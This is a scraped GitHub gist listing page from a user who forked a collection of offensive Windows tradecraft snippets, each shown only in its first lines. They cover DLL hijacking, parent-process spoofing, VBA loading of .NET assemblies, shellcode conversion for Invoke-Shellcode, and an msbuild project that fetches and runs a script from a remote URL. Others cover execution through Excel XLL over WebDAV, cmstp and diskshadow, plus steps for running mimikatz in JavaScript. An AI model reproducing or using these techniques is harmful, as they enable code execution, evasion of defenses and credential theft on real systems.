Skip to content

Instantly share code, notes, and snippets.

View sacwtv's full-sized avatar

sacwtv

16 followers · 15 following
View GitHub Profile
@sacwtv
sacwtv / main.cpp
Created January 9, 2023 02:18 — forked from monoxgas/main.cpp
Adapative DLL Hijacking - Stability Hooking
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
@sacwtv
sacwtv / PPID Spoof & BlockDLLs
Created August 18, 2022 07:40 — forked from rasta-mouse/PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@sacwtv
sacwtv / mscorlib_load_assembly.vba
Created March 12, 2020 08:57 — forked from clavoillotte/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@sacwtv
sacwtv / raw2ps_shellcode.py
Created March 12, 2020 08:56 — forked from byt3bl33d3r/raw2ps_shellcode.py
Converts raw shellcode to a PowerShell compatible byte array (helpful when using custom shellcode with Invoke-Shellcode.ps1)
import sys
ps_shellcode = '@('
with open(sys.argv[1], 'rb') as shellcode:
byte = shellcode.read(1)
while byte != '':
ps_shellcode += '0x{}, '.format(byte.encode('hex'))
byte = shellcode.read(1)
@sacwtv
sacwtv / LoadXSLFromMem.cs
Created March 12, 2020 08:55 — forked from byt3bl33d3r/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace TryCOMXSLLoad
{
class Program
@sacwtv
sacwtv / xslt.proj
Created March 12, 2020 08:54 — forked from byt3bl33d3r/xslt.proj
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"
@sacwtv
sacwtv / ExcelXLL.md
Created March 12, 2020 08:54 — forked from byt3bl33d3r/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@sacwtv
sacwtv / test.inf
Created March 12, 2020 08:51 — forked from bohops/test.inf
Test inf-sct execution (+++ @NickTyrer - https://gist.github.com/NickTyrer/)
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@sacwtv
sacwtv / diskshadow.txt
Created March 12, 2020 08:49 — forked from bohops/diskshadow.txt
Execute
=======
*Interactive Mode
cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit
@sacwtv
sacwtv / Instructions-to-mimikatz-js.txt(2.0-4.0的记录)
Last active March 12, 2020 08:38 — forked from pljoel/Instructions-to-mimikatz-js.txt
mimikatz 2.1.1 in javascript
It is basically a wrap of the following projects:
- mimikatz (https://github.com/gentilkiwi/mimikatz)
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7)
Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863)
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript)
INSTRUCTIONS:
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though)
b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it